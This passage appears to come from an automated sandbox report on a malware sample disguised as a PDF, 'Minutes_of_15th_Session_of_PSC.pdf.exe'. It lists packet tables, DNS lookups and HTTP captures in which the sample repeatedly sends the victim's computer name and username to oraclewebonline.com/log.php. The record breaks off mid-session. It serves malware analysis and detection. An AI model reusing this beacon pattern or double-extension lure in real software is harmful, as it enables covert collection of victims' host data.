              RT_MANIFEST0x14c680x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
              DLLImport
              mscoree.dll_CorExeMain
              TimestampSource PortDest PortSource IPDest IP
              Apr 25, 2024 09:22:35.595103025 CEST49736443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:35.595149040 CEST44349736188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:35.595283985 CEST49736443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:35.607788086 CEST49736443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:35.607800961 CEST44349736188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:36.032064915 CEST44349736188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:36.032215118 CEST49736443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:36.036537886 CEST49736443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:36.036550045 CEST44349736188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:36.036869049 CEST44349736188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:36.092654943 CEST49736443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:36.140162945 CEST44349736188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:36.452161074 CEST44349736188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:36.452239990 CEST44349736188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:36.452363014 CEST49736443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:36.479260921 CEST49736443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:46.825037956 CEST49737443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:46.825124979 CEST44349737188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:46.825208902 CEST49737443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:46.825598955 CEST49737443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:46.825634003 CEST44349737188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:47.243381977 CEST44349737188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:47.245436907 CEST49737443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:47.245496988 CEST44349737188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:47.667180061 CEST44349737188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:47.667241096 CEST44349737188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:47.667459965 CEST49737443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:47.668030977 CEST49737443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:48.589876890 CEST49738443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:48.589947939 CEST44349738188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:48.590028048 CEST49738443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:48.590353012 CEST49738443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:48.590387106 CEST44349738188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:49.010427952 CEST44349738188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:49.056675911 CEST49738443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:49.090167999 CEST49738443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:49.090199947 CEST44349738188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:49.424777985 CEST44349738188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:49.424855947 CEST44349738188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:49.424937963 CEST49738443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:49.472569942 CEST49738443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:55.823889017 CEST49739443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:55.823992014 CEST44349739188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:55.824073076 CEST49739443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:55.824412107 CEST49739443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:55.824453115 CEST44349739188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:56.228166103 CEST44349739188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:56.230082035 CEST49739443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:56.230149031 CEST44349739188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:56.629920006 CEST44349739188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:56.629983902 CEST44349739188.241.39.200192.168.2.4
              Apr 25, 2024 09:22:56.634860039 CEST49739443192.168.2.4188.241.39.200
              Apr 25, 2024 09:22:56.638859987 CEST49739443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:10.698765039 CEST49740443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:10.698890924 CEST44349740188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:10.698976994 CEST49740443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:10.699244976 CEST49740443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:10.699284077 CEST44349740188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:11.105333090 CEST44349740188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:11.107621908 CEST49740443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:11.107690096 CEST44349740188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:11.512527943 CEST44349740188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:11.512584925 CEST44349740188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:11.512787104 CEST49740443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:11.514009953 CEST49740443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:14.294246912 CEST49741443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:14.294336081 CEST44349741188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:14.300362110 CEST49741443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:14.303253889 CEST49741443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:14.303294897 CEST44349741188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:14.718182087 CEST44349741188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:14.720622063 CEST49741443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:14.720649004 CEST44349741188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:15.134407043 CEST44349741188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:15.134464979 CEST44349741188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:15.134521961 CEST49741443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:15.135313034 CEST49741443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:17.651329041 CEST49742443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:17.651374102 CEST44349742188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:17.651726961 CEST49742443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:17.651949883 CEST49742443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:17.651968956 CEST44349742188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:18.067786932 CEST44349742188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:18.072225094 CEST49742443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:18.072247028 CEST44349742188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:18.483947039 CEST44349742188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:18.483984947 CEST44349742188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:18.484256029 CEST49742443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:18.484689951 CEST49742443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:27.325248003 CEST49743443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:27.325335026 CEST44349743188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:27.325459003 CEST49743443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:27.325814009 CEST49743443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:27.325850964 CEST44349743188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:27.729123116 CEST44349743188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:27.744194031 CEST49743443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:27.744220018 CEST44349743188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:28.131493092 CEST44349743188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:28.131536961 CEST44349743188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:28.131637096 CEST49743443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:28.132436037 CEST49743443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:39.120831013 CEST49744443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:39.120934010 CEST44349744188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:39.121011972 CEST49744443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:39.121274948 CEST49744443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:39.121305943 CEST44349744188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:39.527765036 CEST44349744188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:39.529572010 CEST49744443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:39.529630899 CEST44349744188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:39.931715012 CEST44349744188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:39.931792021 CEST44349744188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:39.931899071 CEST49744443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:39.932655096 CEST49744443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:49.011480093 CEST49745443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:49.011523008 CEST44349745188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:49.011585951 CEST49745443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:49.011976004 CEST49745443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:49.011997938 CEST44349745188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:49.416661024 CEST44349745188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:49.420314074 CEST49745443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:49.420340061 CEST44349745188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:49.822067976 CEST44349745188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:49.822134972 CEST44349745188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:49.822280884 CEST49745443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:49.823137999 CEST49745443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:50.463917017 CEST49746443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:50.464001894 CEST44349746188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:50.464178085 CEST49746443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:50.466145992 CEST49746443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:50.466200113 CEST44349746188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:50.887006998 CEST44349746188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:50.889229059 CEST49746443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:50.889259100 CEST44349746188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:51.302469969 CEST44349746188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:51.302561045 CEST44349746188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:51.302645922 CEST49746443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:51.303273916 CEST49746443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:52.276999950 CEST49747443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:52.277106047 CEST44349747188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:52.277208090 CEST49747443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:52.277740955 CEST49747443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:52.277779102 CEST44349747188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:52.693300009 CEST44349747188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:52.695549965 CEST49747443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:52.695619106 CEST44349747188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:53.106901884 CEST44349747188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:53.106956959 CEST44349747188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:53.107012033 CEST49747443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:53.107451916 CEST49747443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:55.370325089 CEST49748443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:55.370408058 CEST44349748188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:55.370490074 CEST49748443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:55.370785952 CEST49748443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:55.370820999 CEST44349748188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:55.776140928 CEST44349748188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:55.778036118 CEST49748443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:55.778105974 CEST44349748188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:56.179966927 CEST44349748188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:56.180027008 CEST44349748188.241.39.200192.168.2.4
              Apr 25, 2024 09:23:56.180176973 CEST49748443192.168.2.4188.241.39.200
              Apr 25, 2024 09:23:56.180983067 CEST49748443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:04.901458025 CEST49749443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:04.901541948 CEST44349749188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:04.902105093 CEST49749443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:04.902406931 CEST49749443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:04.902442932 CEST44349749188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:05.401593924 CEST44349749188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:05.411611080 CEST49749443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:05.411684036 CEST44349749188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:05.807773113 CEST44349749188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:05.807847023 CEST44349749188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:05.807893991 CEST49749443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:05.808556080 CEST49749443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:13.683347940 CEST49750443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:13.683418989 CEST44349750188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:13.683522940 CEST49750443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:13.683765888 CEST49750443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:13.683798075 CEST44349750188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:14.088968992 CEST44349750188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:14.091272116 CEST49750443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:14.091299057 CEST44349750188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:14.494540930 CEST44349750188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:14.494606018 CEST44349750188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:14.494685888 CEST49750443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:14.495379925 CEST49750443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:25.261253119 CEST49751443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:25.261293888 CEST44349751188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:25.261368036 CEST49751443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:25.261729002 CEST49751443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:25.261740923 CEST44349751188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:25.681672096 CEST44349751188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:25.702058077 CEST49751443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:25.702074051 CEST44349751188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:26.098228931 CEST44349751188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:26.098295927 CEST44349751188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:26.104082108 CEST49751443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:26.106635094 CEST49751443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:28.919936895 CEST49752443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:28.920032978 CEST44349752188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:28.920141935 CEST49752443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:28.920527935 CEST49752443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:28.920567036 CEST44349752188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:29.335201979 CEST44349752188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:29.336781979 CEST49752443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:29.336821079 CEST44349752188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:29.749680042 CEST44349752188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:29.749728918 CEST44349752188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:29.749880075 CEST49752443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:29.750503063 CEST49752443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:29.823226929 CEST49753443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:29.823326111 CEST44349753188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:29.823477030 CEST49753443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:29.823726892 CEST49753443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:29.823764086 CEST44349753188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:30.243758917 CEST44349753188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:30.246522903 CEST49753443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:30.246589899 CEST44349753188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:30.659025908 CEST44349753188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:30.659070969 CEST44349753188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:30.659154892 CEST49753443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:30.659678936 CEST49753443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:41.996393919 CEST49754443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:41.996501923 CEST44349754188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:41.996790886 CEST49754443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:41.997117996 CEST49754443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:41.997155905 CEST44349754188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.401599884 CEST44349754188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.404397011 CEST49754443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.404459953 CEST44349754188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.481585979 CEST49754443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.481653929 CEST44349754188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.481766939 CEST44349754188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.481796026 CEST49754443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.481925964 CEST49754443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.484407902 CEST49755443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.484431982 CEST44349755188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.487243891 CEST49755443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.487638950 CEST49755443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.487653017 CEST44349755188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.893999100 CEST44349755188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.894062042 CEST49755443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.896317959 CEST49755443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.896327019 CEST44349755188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.896538019 CEST44349755188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:42.898164034 CEST49755443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:42.940112114 CEST44349755188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:43.303992033 CEST44349755188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:43.304044008 CEST44349755188.241.39.200192.168.2.4
              Apr 25, 2024 09:24:43.304085970 CEST49755443192.168.2.4188.241.39.200
              Apr 25, 2024 09:24:43.304657936 CEST49755443192.168.2.4188.241.39.200
              Apr 25, 2024 09:25:00.289609909 CEST49756443192.168.2.4188.241.39.200
              Apr 25, 2024 09:25:00.289691925 CEST44349756188.241.39.200192.168.2.4
              Apr 25, 2024 09:25:00.289793968 CEST49756443192.168.2.4188.241.39.200
              Apr 25, 2024 09:25:00.290450096 CEST49756443192.168.2.4188.241.39.200
              Apr 25, 2024 09:25:00.290486097 CEST44349756188.241.39.200192.168.2.4
              Apr 25, 2024 09:25:00.704498053 CEST44349756188.241.39.200192.168.2.4
              Apr 25, 2024 09:25:00.709563017 CEST49756443192.168.2.4188.241.39.200
              Apr 25, 2024 09:25:00.709611893 CEST44349756188.241.39.200192.168.2.4
              Apr 25, 2024 09:25:01.121625900 CEST44349756188.241.39.200192.168.2.4
              Apr 25, 2024 09:25:01.121690035 CEST44349756188.241.39.200192.168.2.4
              Apr 25, 2024 09:25:01.122226954 CEST49756443192.168.2.4188.241.39.200
              Apr 25, 2024 09:25:01.122227907 CEST49756443192.168.2.4188.241.39.200
              TimestampSource PortDest PortSource IPDest IP
              Apr 25, 2024 09:22:35.310492992 CEST6321553192.168.2.41.1.1.1
              Apr 25, 2024 09:22:35.587021112 CEST53632151.1.1.1192.168.2.4
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Apr 25, 2024 09:22:35.310492992 CEST192.168.2.41.1.1.10x7b55Standard query (0)oraclewebonline.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Apr 25, 2024 09:21:12.444092035 CEST1.1.1.1192.168.2.40x1527No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
              Apr 25, 2024 09:21:12.444092035 CEST1.1.1.1192.168.2.40x1527No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
              Apr 25, 2024 09:22:35.587021112 CEST1.1.1.1192.168.2.40x7b55No error (0)oraclewebonline.com188.241.39.200A (IP address)IN (0x0001)false
              • oraclewebonline.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.449736188.241.39.2004436464C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe
              TimestampBytes transferredDirectionData
              2024-04-25 07:22:36 UTC111OUTGET /log.php?computername=715575&username=user HTTP/1.1
              Host: oraclewebonline.com
              Connection: Keep-Alive
              2024-04-25 07:22:36 UTC166INHTTP/1.1 403 Forbidden
              Date: Thu, 25 Apr 2024 07:22:36 GMT
              Server: Apache
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
              2024-04-25 07:22:36 UTC27INData Raw: 31 30 0d 0a 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10Access Forbidden0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.449737188.241.39.2004436464C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe
              TimestampBytes transferredDirectionData
              2024-04-25 07:22:47 UTC87OUTGET /log.php?computername=715575&username=user HTTP/1.1
              Host: oraclewebonline.com
              2024-04-25 07:22:47 UTC166INHTTP/1.1 403 Forbidden
              Date: Thu, 25 Apr 2024 07:22:47 GMT
              Server: Apache
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
              2024-04-25 07:22:47 UTC27INData Raw: 31 30 0d 0a 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10Access Forbidden0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.449738188.241.39.2004436464C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe
              TimestampBytes transferredDirectionData
              2024-04-25 07:22:49 UTC87OUTGET /log.php?computername=715575&username=user HTTP/1.1
              Host: oraclewebonline.com
              2024-04-25 07:22:49 UTC166INHTTP/1.1 403 Forbidden
              Date: Thu, 25 Apr 2024 07:22:49 GMT
              Server: Apache
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
              2024-04-25 07:22:49 UTC27INData Raw: 31 30 0d 0a 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10Access Forbidden0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.449739188.241.39.2004436464C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe
              TimestampBytes transferredDirectionData
              2024-04-25 07:22:56 UTC87OUTGET /log.php?computername=715575&username=user HTTP/1.1
              Host: oraclewebonline.com
              2024-04-25 07:22:56 UTC166INHTTP/1.1 403 Forbidden
              Date: Thu, 25 Apr 2024 07:22:56 GMT
              Server: Apache
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
              2024-04-25 07:22:56 UTC27INData Raw: 31 30 0d 0a 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10Access Forbidden0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.449740188.241.39.2004436464C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe
              TimestampBytes transferredDirectionData
              2024-04-25 07:23:11 UTC87OUTGET /log.php?computername=715575&username=user HTTP/1.1
              Host: oraclewebonline.com
              2024-04-25 07:23:11 UTC166INHTTP/1.1 403 Forbidden
              Date: Thu, 25 Apr 2024 07:23:11 GMT
              Server: Apache
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
              2024-04-25 07:23:11 UTC27INData Raw: 31 30 0d 0a 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10Access Forbidden0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.449741188.241.39.2004436464C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe
              TimestampBytes transferredDirectionData
              2024-04-25 07:23:14 UTC87OUTGET /log.php?computername=715575&username=user HTTP/1.1
              Host: oraclewebonline.com
              2024-04-25 07:23:15 UTC166INHTTP/1.1 403 Forbidden
              Date: Thu, 25 Apr 2024 07:23:15 GMT
              Server: Apache
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
              2024-04-25 07:23:15 UTC27INData Raw: 31 30 0d 0a 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10Access Forbidden0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.449742188.241.39.2004436464C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe
              TimestampBytes transferredDirectionData
              2024-04-25 07:23:18 UTC87OUTGET /log.php?computername=715575&username=user HTTP/1.1
              Host: oraclewebonline.com
              2024-04-25 07:23:18 UTC166INHTTP/1.1 403 Forbidden
              Date: Thu, 25 Apr 2024 07:23:18 GMT
              Server: Apache
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
              2024-04-25 07:23:18 UTC27INData Raw: 31 30 0d 0a 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10Access Forbidden0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.449743188.241.39.2004436464C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe
              TimestampBytes transferredDirectionData
              2024-04-25 07:23:27 UTC87OUTGET /log.php?computername=715575&username=user HTTP/1.1
              Host: oraclewebonline.com
              2024-04-25 07:23:28 UTC166INHTTP/1.1 403 Forbidden
              Date: Thu, 25 Apr 2024 07:23:28 GMT
              Server: Apache
              Connection: close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
              2024-04-25 07:23:28 UTC27INData Raw: 31 30 0d 0a 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 10Access Forbidden0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.449744188.241.39.2004436464C:\Users\user\Desktop\Minutes_of_15th_Session_of_PSC.pdf.exe
              TimestampBytes transferredDirectionData
              2024-04-25 07:23:39 UTC87OUTGET /log.php?computername=715575&username=user HTTP/1.1
              Host: oraclewebonline.com
              2024-04-25 07:23:39 UTC166INHTTP/1.1 403 Forbidden
              Date: Thu, 25 Apr 2024 07:23:39 GMT
              Server: Apache
              Connection: close
